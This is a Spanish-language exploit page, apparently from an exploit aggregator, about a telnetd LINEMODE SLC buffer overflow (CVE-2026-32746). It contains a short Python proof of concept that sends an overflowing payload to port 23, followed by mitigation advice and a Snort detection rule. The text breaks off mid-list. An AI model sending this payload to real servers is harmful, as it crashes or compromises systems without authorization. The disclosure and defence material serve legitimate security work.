## https://sploitus.com/exploit?id=6CA58CC4-3CA7-5CC6-A317-6E6A00511F85
# 🚨 **CVE-2026-32746** GNU Inetutils Telnetd RCE
## 🔥 **📌 Resumen Ejecutivo**
**Vulnerabilidad Crítica** | **CVSS 9.8** | **¡Ejecución Remota de Código!**
**Afecta:** `GNU Inetutils Telnetd (versiones previas a 2.7)`
**Tipo:** **OOB Write** en el manejador de subopciones **LINEMODE SLC**
**Vector de Ataque:** **Red (Puerto 23)** | **Sin autenticación requerida**
**Impacto:** **RCE con privilegios del proceso Telnetd**
---
## 🎯 **📖 Descripción Técnica**
Se ha identificado un **desbordamiento de búfer por escritura fuera de límites (OOB Write)** en la función `add_slc` del demonio `telnetd` de **GNU Inetutils**. Este fallo permite a un atacante remoto **inyectar código arbitrario** mediante la manipulación de las **subopciones SLC (Set Local Characters)** del protocolo Telnet.
### **🔍 Detalles Clave**
- **Función Vulnerable:** `add_slc` (procesamiento de caracteres locales).
- **Causa Raíz:** **Falta de validación de límites** en el búfer interno.
- **Explotación:** Envío masivo de secuencias maliciosas **LINEMODE SLC**.
- **Requisitos:** **Ninguno** (acceso directo al puerto 23).
---
## 🛠️ **💻 Proof of Concept (PoC)**
Un atacante puede explotar esta vulnerabilidad mediante un **payload Telnet malicioso** que satura el búfer interno:
```python
#!/usr/bin/env python3
import socket
import sys
# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC IAC SE
IAC = b'\xff'
SB = b'\xfa'
SE = b'\xf0'
LINEMODE = b'\x22'
SLC = b'\x03'
target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600 # Repetición de 600 veces
payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE
print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, 23))
s.sendall(payload)
print("[+] Payload entregado. Verificando caída del servicio/RCE...")
```
⚠️ **¡ADVERTENCIA!** Este código es **solo para fines educativos y de investigación**. Su uso en sistemas sin autorización es **ilegal**.
---
## 📊 **📈 Métricas de Riesgo (CVSS 3.1)**
| **Métrica** | **Valor** | **Descripción** |
|-------------------|-----------------------------------|-----------------------------------------|
| **Vector** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` | **Remoto, sin autenticación** |
| **Puntuación** | **9.8 (CRÍTICO)** 🔴 | **Alto impacto en confidencialidad, integridad y disponibilidad** |
| **Publicación** | 13 de marzo, 2026 | Última modificación: 5 de mayo, 2026 |
---
## 🛡️ **🔒 Mitigación y Soluciones**
### **🚀 Solución Inmediata**
✅ **Actualizar GNU Inetutils** a la versión **parcheada (post-2.7)**.
### **⚡ Workarounds**
🔹 **Deshabilitar `telnetd`** y migrar a **SSH** (recomendado).
🔹 **Bloquear el puerto 23** en firewalls perimetrales.
🔹 **Configurar IDS/IPS** para detectar secuencias **LINEMODE SLC anómalas**.
### **🛡️ Configuración de Seguridad Adicional**
- **Reglas Snort/Suricata:**
```plaintext
alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
```
- **